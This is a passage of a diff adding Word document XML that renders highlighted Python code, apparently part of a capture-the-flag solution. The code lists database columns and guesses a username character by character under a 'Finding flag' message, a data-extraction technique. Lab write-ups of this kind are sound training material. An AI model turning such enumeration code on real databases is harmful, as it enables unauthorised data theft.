+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>choice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ascii_letters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">), </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>database_name</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>table</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">            </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>for</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>column</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>in</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>columns</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">                </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>column</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>print</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"Finding flag ..."</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>i</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>False</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>random</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>choice</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>string</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>ascii_letters</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>""</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>while</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>signal</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> != </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>True</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">        </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>tmp_username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>{0}{1}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>"</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>format</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>username</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
